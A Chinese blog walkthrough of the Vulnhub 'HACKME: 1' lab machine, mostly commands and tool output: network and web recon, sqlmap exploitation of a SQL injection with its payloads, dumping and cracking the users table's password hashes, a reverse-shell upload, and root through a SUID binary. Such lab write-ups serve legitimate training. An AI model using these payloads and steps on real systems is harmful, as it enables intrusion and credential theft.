红队打靶练习:HACKME: 1

于 2023-12-18 17:46:11 发布
阅读量416 收藏 8
点赞数 8
分类专栏: Vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/135068131
版权

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.138  00:50:56:3f:82:5b       VMware, Inc.
192.168.12.254  00:50:56:e4:dd:fa       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.341 seconds (109.35 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.138  00:50:56:3f:82:5b      1      60  VMware, Inc.
 192.168.12.254  00:50:56:e4:dd:fa      1      60  VMware, Inc.
3、nmap
主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:25 CST
Nmap scan report for 192.168.12.1
Host is up (0.0049s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000082s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.138
Host is up (0.000082s latency).
MAC Address: 00:50:56:3F:82:5B (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.000048s latency).
MAC Address: 00:50:56:E4:DD:FA (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.41 seconds


端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.138 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:25 CST
Nmap scan report for 192.168.12.138
Host is up (0.0023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:50:56:3F:82:5B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 22,80 192.168.12.138 --min-rate
10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:30 CST
Nmap scan report for 192.168.12.138
Host is up (0.00030s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:50:56:3F:82:5B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 192.168.12.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.84 seconds

漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80 192.168.12.138 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:27 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.138
Host is up (0.00012s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
|   /login.php:
|     PHPSESSID:
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /login.php: Possible admin folder
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.34 (ubuntu)'
MAC Address: 00:50:56:3F:82:5B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 54.98 seconds
4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.138 nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.138
+ Target Hostname:    192.168.12.138
+ Target Port:        80
+ Start Time:         2023-12-18 15:27:44 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.34 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.34 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /login.php: Admin login page/section found.
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-12-18 15:27:59 (GMT8) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.138
WhatWeb report for http://192.168.12.138
Status    : 200 OK
Title     : <None>
IP        : 192.168.12.138
Country   : RESERVED, ZZ

Summary   : Apache[2.4.34], HTTPServer[Ubuntu Linux][Apache/2.4.34 (Ubuntu)], Meta-Refresh-Redirect[login.php]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.34 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.34 (Ubuntu) (from server string)

[ Meta-Refresh-Redirect ]
        Meta refresh tag is a deprecated URL element that can be
        used to optionally wait x seconds before reloading the
        current page or loading a new page. More info:
        https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh

        String       : login.php

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 18 Dec 2023 07:28:34 GMT
        Server: Apache/2.4.34 (Ubuntu)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 100
        Connection: close
        Content-Type: text/html; charset=UTF-8

WhatWeb report for http://192.168.12.138/login.php
Status    : 200 OK
Title     : Login
IP        : 192.168.12.138
Country   : RESERVED, ZZ

Summary   : Apache[2.4.34], Bootstrap[3.3.7], Cookies[PHPSESSID], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.34 (Ubuntu)], PasswordField[password]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.34 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with
        HTML, CSS, and JS.

        Version      : 3.3.7
        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String       : PHPSESSID

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.34 (Ubuntu) (from server string)

[ PasswordField ]
        find password fields

        String       : password (from field name)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 18 Dec 2023 07:28:35 GMT
        Server: Apache/2.4.34 (Ubuntu)
        Set-Cookie: PHPSESSID=0ibvmsioq46c5ltsn7gd6irqjl; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 527
        Connection: close
        Content-Type: text/html; charset=UTF-8

22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.138 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,bak,html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/index.php            (Status: 200) [Size: 100]
/login.php            (Status: 200) [Size: 1245]
/register.php         (Status: 200) [Size: 1937]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.12.138/uploads/]
/welcome.php          (Status: 302) [Size: 0] [--> login.php]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.138 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.138/_23-12-18_15-42-05.txt

Target: http://192.168.12.138/

[15:42:05] Starting:
[15:42:07] 403 -  293B  - /.php
[15:42:29] 200 -    0B  - /config.php
[15:42:43] 200 -  527B  - /login.php
[15:42:44] 302 -    0B  - /logout.php  ->  login.php
[15:42:56] 200 -  594B  - /register.php
[15:42:59] 403 -  302B  - /server-status
[15:42:59] 403 -  303B  - /server-status/
[15:43:08] 301 -  318B  - /uploads  ->  http://192.168.12.138/uploads/
[15:43:08] 200 -  458B  - /uploads/
3、dirb
┌──(root㉿ru)-[~/kali]
└─# dirb http://192.168.12.138

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Dec 18 15:52:28 2023
URL_BASE: http://192.168.12.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                      GENERATED WORDS: 4612

---- Scanning URL: http://192.168.12.138/ ----
                                                                      + http://192.168.12.138/index.php (CODE:200|SIZE:100)
+ http://192.168.12.138/server-status (CODE:403|SIZE:302)
                                                                      ==> DIRECTORY: http://192.168.12.138/uploads/

---- Entering directory: http://192.168.12.138/uploads/ ----
                                                                      (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)


-----------------
END_TIME: Mon Dec 18 15:52:30 2023
DOWNLOADED: 4612 - FOUND: 2

WEB

创建个账号登陆进入!


测试sql注入,但是没有回显,也不能命令执行。目录也没有什么东西,我们尝试用sqlmap跑一下!

sqlmap

1、爆库
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --dbs --level=3
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:43:01 /2023-12-18/

[16:43:01] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:43:01] [INFO] testing connection to the target URL
[16:43:01] [INFO] testing if the target URL content is stable
[16:43:02] [INFO] target URL content is stable
[16:43:02] [INFO] testing if POST parameter 'search' is dynamic



......




---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:43:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:43:14] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

[16:43:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'

[*] ending @ 16:43:14 /2023-12-18/
2、爆表
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.11#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:47:02 /2023-12-18/

[16:47:02] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:47:02] [INFO] resuming back-end DBMS 'mysql'
[16:47:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:47:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:47:02] [INFO] fetching tables for database: 'webapphacking'
Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+

[16:47:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'

[*] ending @ 16:47:03 /2023-12-18/
3、爆列
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking -T users --columns
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:47:33 /2023-12-18/

[16:47:33] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:47:33] [INFO] resuming back-end DBMS 'mysql'
[16:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:47:33] [INFO] fetching columns for table 'users' in database 'webapphacking'
Database: webapphacking
Table: users
[5 columns]
+---------+----------------------+
| Column  | Type                 |
+---------+----------------------+
| name    | varchar(30)          |
| user    | varchar(30)          |
| address | varchar(50)          |
| id      | smallint(5) unsigned |
| pasword | varchar(70)          |
+---------+----------------------+

[16:47:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'

[*] ending @ 16:47:33 /2023-12-18/
4、爆字段
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking -T users -C user,pasword --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:49:41 /2023-12-18/

[16:49:41] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:49:41] [INFO] resuming back-end DBMS 'mysql'
[16:49:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:49:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:49:41] [INFO] fetching entries of column(s) '`user`,pasword' for table 'users' in database 'webapphacking'
[16:49:42] [INFO] recognized possible password hashes in column 'pasword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:49:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaptih_o6x7290104/sqlmaphashes-jyiyw1xs.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:49:45] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> y
[16:49:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:49:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:49:47] [INFO] starting 2 processes
[16:49:50] [INFO] cracked password 'commando' for hash '6269c4f71a55b24bad0f0267d9be5508'
[16:49:54] [INFO] cracked password 'testtest' for hash '05a671c66aefea124cc08b76ea6d30bb'
[16:49:55] [INFO] cracked password 'hello' for hash '5d41402abc4b2a76b9719d911017c592'
[16:49:58] [INFO] cracked password 'p@ssw0rd' for hash '0f359740bd1cda994f8b55330c86d845'
[16:50:01] [INFO] using suffix '1'
[16:50:15] [INFO] using suffix '123'
[16:50:20] [INFO] cracked password 'woll123' for hash '2a3ac5fec79fdbfe874a48aa01069de8'
Database: webapphacking
Table: users
[7 entries]
+------------+---------------------------------------------+
| user       | pasword                                     |
+------------+---------------------------------------------+
| user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)          |
| test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| woll       | 2a3ac5fec79fdbfe874a48aa01069de8 (woll123)  |
+------------+---------------------------------------------+

六个用户

user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    
user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) 
user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) 
test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) 
superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)          
test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) 

  
superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)

这个用户应该就是超级管理员的用户了!

文件上传&反弹shell

我们使用超级管理员登录!发现一个上传页面!
我们上传一个反弹shell木马!

提权

1、系统信息收集
$ python2 -c 'import pty;pty.spawn("/bin/bash")'

www-data@hackme:/$ uname -a
uname -a
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

www-data@hackme:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.10
Release:        18.10
Codename:       cosmic

www-data@hackme:/$ cat /etc/passwd | grep "home" | grep -v nologin
cat /etc/passwd | grep "home" | grep -v nologin
hackme:x:1000:1000:hackme:/home/hackme:/bin/bash
www-data@hackme:/$

www-data@hackme:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@hackme:/$

www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core/16202/bin/mount
/snap/core/16202/bin/ping
/snap/core/16202/bin/ping6
/snap/core/16202/bin/su
/snap/core/16202/bin/umount
/snap/core/16202/usr/bin/chfn
/snap/core/16202/usr/bin/chsh
/snap/core/16202/usr/bin/gpasswd
/snap/core/16202/usr/bin/newgrp
/snap/core/16202/usr/bin/passwd
/snap/core/16202/usr/bin/sudo
/snap/core/16202/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/16202/usr/lib/openssh/ssh-keysign
/snap/core/16202/usr/lib/snapd/snap-confine
/snap/core/16202/usr/sbin/pppd
/snap/core22/1033/usr/bin/chfn
/snap/core22/1033/usr/bin/chsh
/snap/core22/1033/usr/bin/gpasswd
/snap/core22/1033/usr/bin/mount
/snap/core22/1033/usr/bin/newgrp
/snap/core22/1033/usr/bin/passwd
/snap/core22/1033/usr/bin/su
/snap/core22/1033/usr/bin/sudo
/snap/core22/1033/usr/bin/umount
/snap/core22/1033/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1033/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/home/legacy/touchmenot
/bin/mount
/bin/umount
/bin/ping
/bin/ntfs-3g
/bin/su
/bin/fusermount
2、本地提权
递归搜索可利用文件  hackme用户

www-data@hackme:/home$ ls -alR hackme
ls -alR hackme
hackme:
total 48
drwxr-xr-x 5 hackme hackme 4096 Mar 25  2019 .
drwxr-xr-x 4 root   root   4096 Mar 26  2019 ..
-rw------- 1 hackme hackme 5794 Mar 27  2019 .bash_history
-rw-r--r-- 1 hackme hackme  220 Sep 12  2018 .bash_logout
-rw-r--r-- 1 hackme hackme 3771 Sep 12  2018 .bashrc
drwx------ 2 hackme hackme 4096 Mar 13  2019 .cache
drwx------ 3 hackme hackme 4096 Mar 13  2019 .gnupg
drwxrwxr-x 3 hackme hackme 4096 Mar 21  2019 .local
-rw------- 1 root   root   5588 Mar 25  2019 .mysql_history
-rw-r--r-- 1 hackme hackme  807 Sep 12  2018 .profile
-rw-r--r-- 1 hackme hackme    0 Mar 13  2019 .sudo_as_admin_successful
ls: cannot open directory 'hackme/.cache': Permission denied
ls: cannot open directory 'hackme/.gnupg': Permission denied

hackme/.local:
total 12
drwxrwxr-x 3 hackme hackme 4096 Mar 21  2019 .
drwxr-xr-x 5 hackme hackme 4096 Mar 25  2019 ..
drwx------ 3 hackme hackme 4096 Mar 21  2019 share
ls: cannot open directory 'hackme/.local/share': Permission denied

递归搜索可利用文件  legacy用户

www-data@hackme:/home$ ls -alR legacy
ls -alR legacy
legacy:
total 20
drwxr-xr-x 2 root root 4096 Mar 26  2019 .
drwxr-xr-x 4 root root 4096 Mar 26  2019 ..
-rwsr--r-x 1 root root 8472 Mar 26  2019 touchmenot
3、get root
www-data@hackme:/home$ cd legacy
cd legacy
www-data@hackme:/home/legacy$ ls
ls
touchmenot
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@hackme:/home/legacy# cd /root
cd /root
root@hackme:/root# ls -al
ls -al
total 32
drwx------  5 root root     4096 Mar 26  2019 .
drwxr-xr-x 23 root root     4096 Mar 13  2019 ..
-rw-------  1 root www-data   54 Mar 26  2019 .bash_history
-rw-r--r--  1 root root     3106 Aug  6  2018 .bashrc
drwxr-xr-x  3 root root     4096 Mar 13  2019 .local
-rw-r--r--  1 root root      148 Aug  6  2018 .profile
drwx------  2 root root     4096 Mar 13  2019 .ssh
drwxr-xr-x  3 root root     4096 Mar 13  2019 snap


这个可执行程序可以执行进行提权。
真的学不了一点。。。
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队技巧:隐藏windows服务1
08-03
然后以管理员权限打开个 powershell 窗,运安全描述符定义语 (SDDL) 命令来隐藏我们创建的 mrxn 服务:运成功后,在我们的任务管理器就看不到创
hackme-1打靶记录
wwd180的博客
06-12 84
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
LAMPSECURITY: CTF6 内网拿到root 20211226
32bin的博客
12-26 2589
LAMPSECURITY: CTF6 参考博客: https://blog.csdn.net/weixin_42652002/article/details/112132466?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-2.nonecase&depth_1-utm_source=distribute.pc_releva
【已解决】“X-Content-Type-Options”头缺失或不安全
专注于Java领域开发 关注我 带你玩转Java
06-16 1万+
“X-Content-Type-Options”头缺失或不安全
VulnHub-hackme:1漏洞利用流程
2301_76786857的博客
06-13 185
靶机地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.1291.下载并导入靶机打开vmware——文件—打开—hackme.ova—导入虚拟机2.查看网络适配器将靶机网络适配器改为NAT模式3.启动靶机点击 ▶靶机,开启成功。
HACKME: 1实战演练
龙狼刺的博客
05-24 126
HACKME: 1
红队备忘单:这是为了重新整理我的笔记
02-09
红队备忘单
红队技巧:绕过ESET_NOD32抓取密码1
08-03
